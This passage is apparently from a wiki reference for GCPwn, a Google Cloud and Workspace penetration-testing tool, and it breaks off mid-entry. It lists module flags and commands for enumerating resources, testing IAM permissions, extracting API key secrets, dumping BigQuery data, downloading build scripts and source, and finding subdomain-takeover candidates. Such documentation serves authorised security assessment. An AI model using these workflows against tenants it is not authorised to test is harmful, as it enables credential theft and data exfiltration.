-
Notifications
You must be signed in to change notification settings - Fork 28
CLI Module Reference
If you are new to GCPwn, read Getting Started first.
This page is meant to be the operator-facing module catalog: what each module does and the custom flags it supports.
This reference is generated from the current module mappings and parser flags in source code.
- Runner Reference
- Runner Flags (modules run)
- High-Value Orchestrator Modules
- Module Catalog
- Typical Run Flow
modules list
modules search <keyword>
modules info <module_name>
modules run <module_name> [module_args...]
modules run <module_name> -h| Category | Count |
|---|---|
| Enumeration | 47 |
| Exploit | 7 |
| Process | 2 |
| Unauthenticated | 5 |
GCPwn now ships 50 services. Modules live under four top-level areas:
gcpwn/modules/gcp/ (45 GCP service dirs), gcpwn/modules/workspace/
(Google Workspace), gcpwn/modules/everything/ (cross-cutting orchestrators:
enum_all, enum_gcp, enum_google_workspace, enum_gcp_policy_bindings,
exploit_gcp_setiampolicy, process_gcp_iam_bindings, analyze_vulns), and
gcpwn/modules/opengraph/. Dotted module paths follow
gcpwn.modules.gcp.<service>.enumeration.enum_<service>. The authoritative
module list is gcpwn/mappings/module_mappings.json.
| Flag | Meaning |
|---|---|
--iam |
Run testIamPermissions checks where supported |
--get |
Perform deeper per-resource retrieval where supported |
--download |
Download module-supported artifact/content output |
--project-id, --project-ids, --project-id-file, --current-project, --all-projects
|
Project-scoping selectors for modules that support project targeting |
-v, --debug
|
Verbose/debug output where supported |
Always verify module-specific flags with modules run <module_name> -h.
-
Category:
Processing -
Service Group:
Everything -
What It Does:
- Runs GCPwn's cross-service enumeration workflow from a single module.
- Supports deep IAM checks (
--iam,--all-permissions) as part of the run. - Supports centralized download routing while collecting data.
- Supports Resource Manager scoped-dive controls for org/folder/project IDs while still performing baseline Resource Manager discovery.
Supported Flags
| Flag(s) | Description | Details |
|---|---|---|
--modules |
Pick which services to run (comma/space separated tokens). Omit to run EVERY service. Accepts short names (storage, iam, bq, gke, secrets, compute, …) or full names (cloud-storage). Replaces the old per-service flags. |
e.g. --modules storage,iam gke
|
--list-modules |
Print every --modules service token (with aliases) and exit. |
store_true |
--skip-resource-manager, --no-enum-resources
|
Skip Resource Manager discovery: do NOT (re-)enumerate projects/folders/orgs; reuse the already-cached hierarchy. Use when it is unchanged since a prior (slow) run. | store_true |
--parallel-services |
Enumerate services concurrently across projects with N workers (default 1 = sequential). Prints a resume token at start. |
int, default 1
|
--resume |
Resume a prior --parallel-services run by its token: re-runs ONLY the units left incomplete. |
token string |
--list-tokens |
List saved resume tokens (interrupted/failed parallel runs) and exit. | store_true |
--stop-on-denied |
Speed knob: on the FIRST 403 permission-denied in a service's region/zone fan-out, skip that service's remaining regions (treat like a disabled API) instead of probing every region. OFF by default (a denial in one region doesn't prove denial in another). | store_true |
--download-output |
Output directory for downloaded artifacts. | string path |
--threads |
Worker threads for region/zone fan-out. | int, default 4
|
--regions-list |
Regions in comma-separated format. | e.g. us-central1,us-east1
|
--zones-list |
Zones in comma-separated format. | e.g. us-central1-a,us-east1-b
|
--project-allowlist |
Resource Manager project ID scoped-dive filter (inline). | accepts space/comma-separated project IDs |
--project-allowlist-file |
Resource Manager project ID scoped-dive filter (file). | one ID per line |
--folder-allowlist |
Resource Manager folder ID scoped-dive filter (inline). | numeric IDs only; space/comma-separated |
--folder-allowlist-file |
Resource Manager folder ID scoped-dive filter (file). | numeric IDs only; one ID per line |
--org-allowlist |
Resource Manager organization ID scoped-dive filter (inline). | numeric IDs only; space/comma-separated |
--org-allowlist-file |
Resource Manager organization ID scoped-dive filter (file). | numeric IDs only; one ID per line |
--parent-allowlist-folder |
Parent folder scope constraint (inline). | numeric IDs only; intersects descendants with direct allowlist scope |
--parent-allowlist-folder-file |
Parent folder scope constraint (file). | numeric IDs only; one ID per line |
--parent-allowlist-org |
Parent organization scope constraint (inline). | numeric IDs only; intersects descendants with direct allowlist scope |
--parent-allowlist-org-file |
Parent organization scope constraint (file). | numeric IDs only; one ID per line |
--all-resource-permissions, --all-permissions
|
For Resource Manager, pass full large permission test set. | alias pair, dest=all_resource_permissions
|
--download |
Enable download token routing. | optional value, default token set when passed with no value |
--dont-download |
Exclude download tokens/categories from --download. |
comma-separated |
--download-timeout |
Per-unit wall-clock cap (seconds) on downloads: skip the rest of a unit and move on once it is exceeded. Per bucket for Cloud Storage; per download type, per project for every other service. 0/unset = unlimited. See Downloads-to-Disk. |
int seconds, default 0
|
--download-google-drive |
Opt-in Google Drive in the Workspace phase: runs enum_drive --all-users --download (lists AND downloads Drive file content for every cached user). OFF by default so Drive files are never pulled by accident; separate from the GCP --download categories. |
store_true |
--iam |
Execute testIamPermissions wherever applicable. |
store_true |
--get |
Fetch deeper per-resource metadata where supported. | store_true |
--debug |
Enable debug logging. | store_true |
--asset-inventory |
Opt-in Cloud Asset Inventory scan (also selectable as --modules asset-inventory / alias cai). Additive: a bare enum_all SKIPS it; adding it runs everything PLUS it. |
store_true |
Service selection moved to
--modules. There are no longer per-service--cloud-storage/--gke/ … flags — an old flag now errors with "unrecognized arguments". Select services with--modules <tokens>(comma/space separated), or omit it to run everything. Runmodules run enum_all --list-modulesfor the full token list (each service's canonical token plus friendly aliases likestorage/gcs,iam,bq,compute/gce,secrets,rm).
Scoped-dive behavior notes:
-
enum_allperforms broad Resource Manager discovery by default. Pass--no-enum-resources(a.k.a.--skip-resource-manager) to skip it and reuse the already-cached hierarchy — handy when you've already enumerated projects/folders/orgs and nothing has changed. - If no allowlist flags are provided, all discovered resources/projects are in scope.
- When any allowlist flag is provided (
--project-allowlist*,--folder-allowlist*,--org-allowlist*), deeper Resource Manager actions (--get,--iam, recursive dive) are scoped to those IDs. - If you provide one direct allowlist type (for example project allowlist only), the other resource types are treated as out of scope unless explicitly allowlisted.
- Parent allowlist flags (
--parent-allowlist-folder*,--parent-allowlist-org*) apply descendant filtering (any nested depth). With direct allowlists present, effective scope is an intersection; with parent-only allowlists, scope becomes all descendants under those parents. - When any allowlist flag is provided, non-Resource-Manager service modules are only executed for projects that resolve into the effective allowlist scope.
- Exception:
enum_gcp_policy_bindingsis still invoked once at the end ofenum_all(final loop) to build policy-binding cache/output. -
enum_allruns GCP services plus a once-only Google Workspace phase at the end.enum_gcpis identical toenum_allbut without the trailing Workspace phase;enum_google_workspaceruns only the Workspace enumerators once (tenant-scoped, needs Workspace admin creds or service-account domain-wide delegation). -
--asset-inventoryis additive and opt-in: a bareenum_allskips the (slow, org-wide) Cloud Asset Inventory scan; pass--asset-inventoryto run everything else PLUS it.
Example Module Commands
# TLDR: Full baseline cross-service run with IAM checks
modules run enum_all --iam
# TLDR: Full baseline + broad permission brute checks at org/folder/project scope
modules run enum_all --iam --all-permissions
# TLDR: List every --modules service token (with aliases), then exit
modules run enum_all --list-modules
# TLDR: Run only compute + storage families with constrained regions
modules run enum_all --modules compute,storage --regions-list us-central1
# TLDR: Run just IAM + Cloud Storage + GKE (short tokens; comma OR space separated)
modules run enum_all --modules iam,storage gke
# TLDR: Reuse the cached project/folder/org hierarchy (skip Resource Manager re-discovery)
modules run enum_all --iam --no-enum-resources
# TLDR: Speed up a broad run by short-circuiting a service's regions on the first 403 denial
modules run enum_all --iam --stop-on-denied
# TLDR: Enable download routing, but exclude large content buckets
modules run enum_all --download --dont-download buckets
# TLDR: Download everything, but time-box each unit (per bucket / per download type) to 90s
modules run enum_all --download --download-timeout 90
# TLDR: Keep broad Resource Manager discovery but scope deep dive to selected IDs
modules run enum_all --modules resource-manager --iam --get --project-allowlist-file projects.txt --folder-allowlist 123456789012 --org-allowlist-file org_ids.txt
# TLDR: Scope to descendants under parent folders/orgs
modules run enum_all --parent-allowlist-folder-file parent_folders.txt --parent-allowlist-org 123456789012
# TLDR: Run everything PLUS the opt-in Cloud Asset Inventory scan
modules run enum_all --iam --asset-inventory
# TLDR: GCP only, no trailing Google Workspace phase
modules run enum_gcp --iam
# TLDR: Google Workspace tenant-scoped enumeration only
modules run enum_google_workspace --impersonate admin@your-domain.comGCP-only sibling of enum_all: identical service coverage, allowlist
scoping, download routing, and --parallel-services / --resume / --list-tokens
behavior, but without the trailing once-only Google Workspace phase. Reach for
enum_gcp when your credentials are GCP-only (most service-account keys) so you
don't spend a phase probing Workspace APIs you can't reach. Every enum_all flag
above applies here unchanged.
Example Module Commands
# TLDR: Full GCP baseline with IAM checks (no Workspace phase)
modules run enum_gcp --iam
# TLDR: Fan services out across projects with 5 workers (resumable by token)
modules run enum_gcp --iam --parallel-services 5
# TLDR: List saved run tokens (interrupted runs) so you can pick one to resume
modules run enum_gcp --list-tokens
# TLDR: Resume a specific interrupted run by its token
modules run enum_gcp --parallel-services 5 --resume 20260101120000Runs only the Google Workspace enumerators (Cloud Identity + Admin SDK
Directory), once, tenant-scoped — the same phase enum_all appends at the end,
exposed as a standalone module. Requires Workspace admin credentials or a service
account with domain-wide delegation (--impersonate <admin@domain>); ordinary GCP
service-account keys have no Workspace access and this will no-op for them. It is
tenant-scoped (not per-project), so run it once per workspace.
Example Module Commands
# TLDR: Enumerate the Workspace tenant via domain-wide delegation
modules run enum_google_workspace --impersonate admin@your-domain.com-
Category:
Processing -
Service Group:
Everything -
What It Does:
- Collects IAM allow-policy bindings (
getIamPolicy) across the discovered resource tree. - Also enumerates IAM deny policies (IAM v2 Policies API) for each org/folder/project scope into
iam_deny_policies— see IAM Enumeration & Analysis Workflow. - Reads from cached workspace resource tables; previously enumerated resources can still be included.
- Uses Cloud Asset Inventory when available.
- Falls back to per-service APIs for Storage, BigQuery, Compute, Functions, Secrets, KMS, Run, Pub/Sub, Spanner, Service Directory, Cloud Tasks, and Artifact Registry.
- Collects IAM allow-policy bindings (
Cache behavior note:
-
enum_allallowlists control which service modules run, butenum_gcp_policy_bindingsoperates on cached resources already in the workspace DB. - If you previously enumerated resources outside the current allowlist, those resources can still be included when
enum_gcp_policy_bindingsruns.
Supported Flags
| Flag(s) | Description | Details |
|---|---|---|
--ensure-tree |
If hierarchy data is missing, run Resource Manager collection first. | store_true |
--no-ensure-tree |
Never run Resource Manager here; use only the already-cached hierarchy. Set automatically by enum_all --no-enum-resources. |
store_true |
--resource-manager |
Enumerate org/folder/project IAM policies. |
store_true; service filter |
--storage |
Enumerate Cloud Storage bucket IAM policies. |
store_true; service filter |
--bigquery |
Enumerate BigQuery dataset IAM policies. |
store_true; service filter |
--functions |
Enumerate Cloud Functions IAM policies. |
store_true; service filter |
--compute |
Enumerate Compute Engine instance IAM policies. |
store_true; service filter |
--service-accounts |
Enumerate service account IAM policies. |
store_true; service filter |
--secrets |
Enumerate Secret Manager IAM policies. |
store_true; service filter |
--cloud-run |
Enumerate Cloud Run service/job IAM policies. |
store_true; service filter |
--cloud-tasks |
Enumerate Cloud Tasks queue IAM policies. |
store_true; service filter |
--artifact-registry |
Enumerate Artifact Registry repository IAM policies. |
store_true; service filter |
--cloud-kms |
Enumerate KMS keyring/cryptokey IAM policies. |
store_true; service filter |
--pubsub |
Enumerate Pub/Sub topic/subscription/snapshot/schema IAM policies. |
store_true; service filter |
--service-directory |
Enumerate Service Directory namespace/service IAM policies. |
store_true; service filter |
-v, --debug
|
Enable low-level debug logging. | store_true |
Example Module Commands
# TLDR: Enumerate IAM policies across all supported services
modules run enum_gcp_policy_bindings
# TLDR: Ensure hierarchy exists first, then collect only selected services
modules run enum_gcp_policy_bindings --ensure-tree --resource-manager --storage --bigquery
# TLDR: Focus on service-account and Cloud Run policy surfaces with debug logging
modules run enum_gcp_policy_bindings --service-accounts --cloud-run --debug-
Category:
Process -
Service Group:
Everything -
What It Does:
- Processes enumerated IAM role/binding data for risky permission patterns.
- Supports both convenience and custom roles alongside predefined GCP roles.
- Exports findings to CSV or TXT formats.
Supported Flags
| Flag(s) | Description | Details |
|---|---|---|
--force-refresh-bindings |
Re-enumerate IAM bindings before processing. |
store_true; useful after new enumeration data |
--csv |
Write CSV output report. | store_true |
--txt |
Write TXT output report. | store_true |
--output |
Output directory for report files. | optional path |
--silent |
Suppress stdout summary output. | store_true |
-v, --debug
|
Enable verbose processing logs. | store_true |
Example Module Commands
# TLDR: Process existing IAM bindings with default console output
modules run process_gcp_iam_bindings
# TLDR: Force refresh IAM bindings first, then export CSV report
modules run process_gcp_iam_bindings --force-refresh-bindings --csv --output ./gcpwn_output/reports
# TLDR: Produce TXT output quietly for file-only workflows
modules run process_gcp_iam_bindings --txt --silent --output ./gcpwn_output/reports-
Category:
Processing -
Service Group:
OpenGraph -
What It Does:
- Builds OpenGraph-oriented IAM/resource context from collected workspace data.
- Exports BloodHound-compatible GCP OpenGraph JSON.
- Can build the graph directly from a Cloud Asset Inventory export file (
--cai-file) with no prior enumeration and no SQLite tables.
Supported Flags
| Flag(s) | Description | Details |
|---|---|---|
-o, --out
|
Output directory for OpenGraph JSON exports (files written as opengraph_<folder_name>.json). |
optional dir path |
--reset |
Delete existing OpenGraph rows for this workspace before rebuilding. | store_true |
--use-existing-opengraph-db |
Skip the rebuild and re-export the existing opengraph_nodes/opengraph_edges. |
store_true; cannot combine with --cai-file
|
--cai-file |
Build the graph directly from a Cloud Asset Inventory export FILE (NDJSON from gcloud asset export, or a JSON array of assets) INSTEAD of the SQLite tables. No prior enumeration needed; the generated graph is exported but NOT persisted to the workspace. |
path to export file |
--split-json-output |
Additionally write sectioned/chunked JSON files for easier BloodHound uploads. | store_true |
--include-all |
Include generic IAM binding edges, not only collapsed dangerous built-in edges. Default mode collapses dangerous CAN_* into ROLE_OWNER/ROLE_EDITOR. |
store_true |
--expand-inherited |
Fan ancestor (org/folder) bindings DOWN to every descendant scope; each descendant binding node gets a @<scope>#src:<source> provenance suffix and its own dangerous edges. Without it, an ancestor binding stays attached to the ancestor only. |
store_true |
--cond-eval |
Conditional-evaluation pass-through mode. Conditioned bindings already get a #cond:<hash> node suffix and conditional/condition_expr_raw/condition_hash properties; this flag does not evaluate the CEL or narrow resources yet (output is identical on or off). |
store_true; no-op filtering |
--groups |
Run only the users/groups mapping step. |
store_true; step selector |
--iam-bindings |
Run only the IAM bindings graph step. |
store_true; step selector |
--inferred-permissions |
Run only the inferred credential-permissions graph step. |
store_true; step selector |
--resource-expansion |
Run only the resource expansion graph step. |
store_true; step selector |
-v, --debug
|
Enable verbose graph-build logging. | store_true |
Example Module Commands
# TLDR: Full OpenGraph build and export to a directory
modules run process_og_gcpwn_data --reset --out ./gcpwn_output/opengraph
# TLDR: Expand inherited IAM edges and include broader IAM edge set
modules run process_og_gcpwn_data --expand-inherited --include-all --out ./gcpwn_output/opengraph
# TLDR: Run only targeted graph stages
modules run process_og_gcpwn_data --iam-bindings --resource-expansion --out ./gcpwn_output/opengraph
# TLDR: Build the graph straight from a Cloud Asset Inventory export file (no enumeration / no DB)
modules run process_og_gcpwn_data --cai-file ./cai_export.ndjson --out ./gcpwn_output/opengraph-
Category:
Processing -
Service Group:
OpenGraph -
What It Does:
- Pushes OpenGraph/BloodHound custom node-type metadata to a BloodHound custom-node endpoint.
- Useful as a standalone styling step after graph generation.
Supported Flags
| Flag(s) | Description | Details |
|---|---|---|
--push-custom-node-attributes-url |
BloodHound custom-node endpoint URL for node-attribute push. | default http://127.0.0.1:8080/api/v2/custom-nodes
|
--push-custom-node-attributes-token |
Bearer token used for custom-node push. | optional string token |
--custom-node-auth-mode |
Auth mode for style sync (bearer or signature). |
default bearer
|
--push-custom-node-attributes-token-id |
API token ID for signature auth mode. | optional string token ID |
--push-custom-node-attributes-token-key |
API token key/secret for signature auth mode. | optional string token key |
--prompt-custom-node-token |
Prompt for bearer token if none is supplied. |
store_true; interactive |
--prompt-custom-node-signature-creds |
Prompt for API token ID/key if none is supplied (signature mode). |
store_true; interactive |
Example Module Commands
# TLDR: Push custom node metadata directly
modules run process_og_node_color_images \
--push-custom-node-attributes-url http://127.0.0.1:8080/api/v2/custom-nodes \
--push-custom-node-attributes-token <BLOODHOUND_BEARER_TOKEN>
# TLDR: Signature auth direct flags
modules run process_og_node_color_images \
--custom-node-auth-mode signature \
--push-custom-node-attributes-token-id <TOKEN_ID> \
--push-custom-node-attributes-token-key <TOKEN_KEY>Interactive walkthrough example output:
(None:None)> modules run process_og_node_color_images
[*] No arguments supplied. Launching BloodHound custom-node sync setup.
[*] BloodHound custom-node URL (press Enter to use default: http://127.0.0.1:8080/api/v2/custom-nodes):
> Custom-node sync: choose auth mode
>> [1] Bearer JWT
>> [2] API key signature
> [3] Exit
> Choose an option: 2
> Choose a saved BloodHound API token or enter a new one:
>> [1] Saved Token ID: <TOKEN_ID> (http://127.0.0.1:8080/api/v2/custom-nodes)
>> [2] Enter a new API token ID/key
> [3] Exit
> Choose an option: 1
[*] custom-nodes sync complete: unchanged=46, updated=0, created=0
Every module runs three ways:
-
In the REPL:
modules run <module_name> [flags] -
Non-interactive drive-through (authenticated):
gcpwn --module <module_name> --workspace WORKSPACE_NAME --cred CRED_NAME [project selector] [flags]— see Non-Interactive Runs. -
Non-interactive (unauthenticated):
gcpwn --module <unauth_module> [flags]
Flags shared across most enumeration modules:
-
Project scope:
--project-id/--project-ids/--project-id-file,--current-project, or--all-projects. -
Region/zone scope:
--all-regions/--all-zones, or--regions-list/--zones-list(comma lists), or--regions-file/--zones-file. -
--gethydrate full per-resource detail;--iamruntestIamPermissionsper resource;--downloadsave fetched payloads/loot to disk (module-specific);-v/--debugverbose. -
Component selectors (
--<component>) limit an enumerator to specific resource types; omit to run all.
Resuming a long run (token-based): the long enumerators — enum_all / enum_gcp (with --parallel-services N), enum_gcp_policy_bindings, and enum_google_workspace — record each completed work unit in a workspace-scoped ledger keyed by a per-run token, printed at the start of every run (e.g. [*] Run token: 20260710131846). A plain re-run starts from the beginning (fresh token). To continue an interrupted run instead, pass --resume <token> — it re-runs only the units that token left incomplete. Unit granularity: (project, service) for enum_all/enum_gcp, per service-group for enum_gcp_policy_bindings, per enumerator for enum_google_workspace.
The examples below use
WORKSPACE_NAME,CRED_NAME, andPROJECT_IDas placeholders — substitute your own workspace/credential/project names.
-
Service Group:
AgentPlatform - What It Does: Enumerates Vertex AI (aiplatform) resources — datasets, endpoints, models, featurestores and their entity types, feature groups/online stores/views, reasoning engines, and notebook runtime templates. Offensive angle: inventories ML/AI assets (training data, deployed models, agent reasoning engines) and can test IAM permissions against them for access and potential model/data theft.
-
Key Flags: Component selectors
--datasets,--endpoints,--models,--featurestores,--entity-types,--feature-groups,--feature-online-stores,--feature-views,--reasoning-engines,--notebook-runtime-templates(resources areglobal-scoped);--iam(TestIamPermissions; endpoints unsupported);--get;--debug. Runmodules run enum_agentplatform -hfor full options. -
Example:
modules run enum_agentplatform --datasets --models --reasoning-engines --iam gcpwn --module enum_agentplatform --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --datasets --models --reasoning-engines --iam
-
Service Group:
Everything - What It Does: One-command cross-service enumeration: runs every GCP enumerator (optionally with IAM permission checks and broad permission brute-forcing), routes module download outputs, then runs a trailing tenant-scoped Google Workspace phase. See High-Value Orchestrator Modules above for the full flag reference.
-
Key Flags:
--modules <tokens>to pick services (or none to run all);--no-enum-resourcesto reuse the cached hierarchy;--stop-on-deniedto short-circuit a service's regions on the first 403;--parallel-services N(parallel, ledger-resumable); IAM/permission and download-routing flags. Runmodules run enum_all -h(or--list-modules) for full options. -
Example:
modules run enum_all --modules storage,iam --parallel-services 4 gcpwn --module enum_all --workspace WORKSPACE_NAME --cred CRED_NAME --all-projects --parallel-services 4 # a plain re-run starts fresh; to resume after Ctrl+C/failure, pass --resume <token> (the token is printed at run start)
-
Service Group:
Everything -
What It Does: Runs every GCP enumeration module across the selected project(s) and pipelines IAM allow-policy bindings per hierarchy node; the GCP-only variant of
enum_all(skips the Workspace phase). It builds the full resource + IAM picture used for permission analysis and OpenGraph attack-path graphing. -
Key Flags:
--parallel-services N(cross-project pool + ledger-based resume),--threads N(region/zone fan-out), per-service selectors like--cloud-storage/--cloud-compute/--gke/--cloud-run/--cloud-kms/--resource-manager(default: all),--iam,--get,--all-resource-permissions,--download [all]/--dont-download,--download-output,--download-timeout N(per-unit wall-clock cap on downloads: per bucket for Cloud Storage, per download type per project elsewhere — see Downloads-to-Disk),--regions-list/--zones-list,-v/--debug. Runmodules run enum_gcp -hfor full options. -
Example:
modules run enum_gcp --iam --parallel-services 4 gcpwn --module enum_gcp --workspace WORKSPACE_NAME --cred CRED_NAME --all-projects --iam --parallel-services 4 # a plain re-run starts fresh; to resume after Ctrl+C/failure, pass --resume <token> (the token is printed at run start)
-
Service Group:
Google Workspace - What It Does: Tenant-scoped run-once orchestrator that runs every registered Workspace enumerator in turn (Cloud Identity groups/memberships/users, admin roles + role assignments, org units, domains, mobile devices, OAuth tokens), passing args straight through and tolerating individual module failures. Builds the full Workspace identity/privilege picture in one call.
-
Key Flags: args pass through to sub-modules — tenant scope
--customer-id C.../--org-id <numeric>,--impersonate <admin@domain>(SA domain-wide delegation),--transitive,--get,-v/--debug. Runmodules run enum_google_workspace -hfor full options. -
Example:
modules run enum_google_workspace --customer-id C0xxxxxxx --impersonate admin@example.com gcpwn --module enum_google_workspace --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --customer-id C0xxxxxxx --impersonate admin@example.com
-
Service Group:
API Gateway -
What It Does: Enumerates API Gateway APIs, gateways, and API configs (via GAPIC list/get) and can download the OpenAPI documents embedded in each config; the offensive angle is surfacing gateway hostnames/managed services and each config's
gateway_service_account(the identity the deployed gateway runs as). -
Key Flags: Component selectors
--apis/--gateways/--configs(default: all); gateways are region-scoped via--all-regions|--regions-list|--regions-file;--get(hydrate full payloads),--iam(TestIamPermissions on gateways/APIs/configs),--download(write config OpenAPI docs to loot, implies--get); manual id args--api-ids/--gateway-ids/--config-ids. Runmodules run enum_apigateway -hfor full options. -
Example:
modules run enum_apigateway --gateways --configs --all-regions --iam --download gcpwn --module enum_apigateway --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --gateways --configs --all-regions --iam --download
-
Service Group:
API Keys -
What It Does: Enumerates project API Keys (api_keys_v2 list/get) and can retrieve/persist each key's secret
key_stringvia getKeyString; the offensive angle is recovering usable API key secrets for downstream unauthenticated abuse (Maps/Gemini/Vertex). -
Key Flags: Component selector
--keys(default);--include-key-string(fetch sensitive secret strings, implies--get);--download(write captured key strings to loot files, implies--get);--get(hydrate key payload); manual id arg--key-ids(shortmy-keyor fullprojects/.../keys/KEY_ID). Runmodules run enum_apikeys -hfor full options. -
Example:
modules run enum_apikeys --keys --include-key-string --download gcpwn --module enum_apikeys --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --keys --include-key-string --download
-
Service Group:
App Engine - What It Does: Enumerates the App Engine hierarchy (the per-project application singleton, services, versions, and running instances) via appengine_admin_v1; the offensive angle is exposing deployed runtimes/environments, traffic splits, and the VM instances backing each version.
-
Key Flags: Component selectors
--app/--services/--versions/--instances(versions nest under services, instances under versions; default: all);--get(hydrate full payloads); manual id args--app-name/--service-ids/--version-ids/--instance-ids(no--iam— IAM unsupported here). Runmodules run enum_appengine -hfor full options. -
Example:
modules run enum_appengine --services --versions --instances --get gcpwn --module enum_appengine --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --services --versions --instances --get
-
Service Group:
Artifact Registry - What It Does: Enumerates Artifact Registry repositories, packages, and versions (plus typed Docker/Python/npm/Maven/apt/yum listings) and can download artifact file bytes from the registry; the offensive angle is pulling published packages/images (potential source, secrets, or supply-chain footholds) out of the loot directory.
-
Key Flags: Core selectors
--repositories/--packages/--versions; optional typed selectors--docker-images/--python-packages/--npm-packages/--maven-artifacts/--apt-artifacts/--yum-artifacts; region scope--all-regions|--regions-list|--regions-file;--download[=SCOPE](comma-list orall; Docker is references-only),--limit,--get,--iam(repositories),--threads; manual inputs--repository-ids(LOCATION/ID),--repository-names/--repository-names-file(full names),--package-names. Runmodules run enum_artifactregistry -hfor full options. -
Example:
modules run enum_artifactregistry --repositories --all-regions --iam --download all --threads 5 gcpwn --module enum_artifactregistry --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --repositories --all-regions --iam --download all --threads 5
-
Service Group:
Batch - What It Does: Enumerates Cloud Batch jobs per project+location (batch_v1 list/get, read-only) and can download the runnable script command text embedded in each job's task groups; the offensive angle is reading job definitions/inline scripts that may contain credentials or sensitive commands.
-
Key Flags: Component selector
--jobs(default); region scope--all-regions(wildcard location-) |--regions-list|--regions-file;--download(write per-job runnable script text to loot, implies--get),--get,--debug(no--iam). Runmodules run enum_batch -hfor full options. -
Example:
modules run enum_batch --jobs --regions-list us-central1 --download gcpwn --module enum_batch --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --jobs --regions-list us-central1 --download
-
Service Group:
BigQuery -
What It Does: Enumerates BigQuery datasets, tables, and routines (UDFs/procedures) and can bulk-download full table contents to JSONL loot files; the offensive angle is dumping sensitive table data (
bigquery.tables.getData) and reviewing routine definitions. -
Key Flags: Component selectors
--datasets/--tables/--routines(nest under datasets; default: all);--download[=table](stream table rows to JSONL, forces--tables+--get),--download-limit N(cap tables, 0 = unlimited),--get,--iam(TestIamPermissions on tables/routines); manual id args--dataset-ids(project.dataset),--table-ids(project.dataset.table),--routine-ids(project.dataset.routine). Runmodules run enum_bigquery -hfor full options. -
Example:
modules run enum_bigquery --datasets --tables --iam --download table --download-limit 5 gcpwn --module enum_bigquery --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --datasets --tables --iam --download table --download-limit 5
-
Service Group:
Bigtable - What It Does: Enumerates Cloud Bigtable instances, tables, backups (swept across all clusters), and authorized views via the admin v2 clients (read-only); the offensive angle is mapping data stores plus recoverable backups and probing instance/table permissions.
-
Key Flags: Component selectors
--instances/--tables/--backups/--authorized-views(tables/backups nest under instances, authorized-views under tables; default: all);--iam(TestIamPermissions on instances and tables),--get,--debug. Runmodules run enum_bigtable -hfor full options. -
Example:
modules run enum_bigtable --instances --tables --backups --iam gcpwn --module enum_bigtable --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --instances --tables --backups --iam
-
Service Group:
Cloud Build -
What It Does: Enumerates Cloud Build triggers, recent builds, and repository connections across regions. Build/trigger configs expose the service account builds run as and often leak secrets/source in build steps, which the
--downloadbuild/step summaries capture for review. -
Key Flags: Component selectors
--triggers/--builds/--connections; manual ids--trigger-ids/--build-ids/--connection-ids; region scope--all-regions|--regions-list|--regions-file;--page-size(builds);--get;--iam(connections only);--download [build]with--download-limit. Runmodules run enum_cloudbuild -hfor full options. -
Example:
modules run enum_cloudbuild --builds --all-regions --download --download-limit 20 gcpwn --module enum_cloudbuild --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --builds --all-regions --download --download-limit 20
-
Service Group:
Cloud Composer -
What It Does: Read-only enumeration of Cloud Composer (managed Airflow) environments per region. Environment configs reveal the runtime service account, GKE/network wiring, and Airflow settings;
--downloadwrites each environment's config to disk for offense review. -
Key Flags: Component selector
--environments; region scope--all-regions(wildcard-) |--regions-list|--regions-file;--get;--download. Runmodules run enum_cloudcomposer -hfor full options. -
Example:
modules run enum_cloudcomposer --environments --regions-list us-central1 --download gcpwn --module enum_cloudcomposer --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --environments --regions-list us-central1 --download
-
Service Group:
Compute - What It Does: Enumerates Compute Engine load-balancing surfaces — backend buckets/services, forwarding rules, URL maps, and target proxies. The offensive angle is discovering public-facing entry points and how front-end rules map to back-end services.
-
Key Flags: Region scope
--all-regions|--regions-list|--regions-file;--get,--iam,--threads(parallelism). Runmodules run enum_cloudcompute_lb -hfor full options. -
Example:
modules run enum_cloudcompute_lb --all-regions --iam gcpwn --module enum_cloudcompute_lb --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --all-regions --iam
-
Service Group:
Compute - What It Does: Enumerates Compute Engine networking — VPC networks, subnetworks, firewall rules, routers/NAT, VPN gateways/tunnels, peerings, and interconnect attachments. The offensive angle is mapping reachability and exposed surfaces (open firewall rules, external IPs) across the environment.
-
Key Flags: Region scope
--all-regions|--regions-list|--regions-file;--get,--iam,--threads(parallelism). Runmodules run enum_cloudcompute_network -hfor full options. -
Example:
modules run enum_cloudcompute_network --all-regions --iam --threads 5 gcpwn --module enum_cloudcompute_network --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --all-regions --iam
-
Service Group:
Compute - What It Does: Enumerates the core Compute Engine resource plane — projects, instances, disks, images, snapshots, machine images, node groups, reservations, and instance groups. The offensive angle is that each instance exposes its attached service account and metadata, and you can pull serial-port output or take a screenshot of a running VM.
-
Key Flags: Broad scope
--all-regions/--all-zones; targeted--regions-list/--zones-list(+-filevariants);--instance-names/--instance-names-file(instance targeting);--get,--iam; artifact capture--download-serial(serial console output) and--take-screenshot;--output. Runmodules run enum_cloudcompute_resources -hfor full options. -
Example:
modules run enum_cloudcompute_resources --all-zones --iam --get --download-serial gcpwn --module enum_cloudcompute_resources --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --all-zones --iam --get
-
Service Group:
Cloud DNS -
What It Does: Enumerates Cloud DNS managed zones (project-scoped) and their record sets. Record sets map internal hostnames/IPs and can surface dangling records for subdomain takeover;
--downloadwrites per-zone CSV-style record files. -
Key Flags: Component selectors
--zones/--record_sets; manual--zone-names;--record-typefilter (A/CNAME/TXT);--get;--iam(zones);--download. Runmodules run enum_clouddns -hfor full options. -
Example:
modules run enum_clouddns --zones --record_sets --record-type A --download gcpwn --module enum_clouddns --workspace WORKSPACE_NAME --cred CRED_NAME --current-project --zones --record_sets --record-type A --download
-
Service Group:
Cloud Functions -
What It Does: Enumerates Cloud Functions (v1/v2) across regions, capturing each function's runtime service account, HTTPS trigger URL, and state.
--downloadpulls the deployed source bundle,--external-curlprobes function URLs for anonymous invocation. -
Key Flags: Component selector
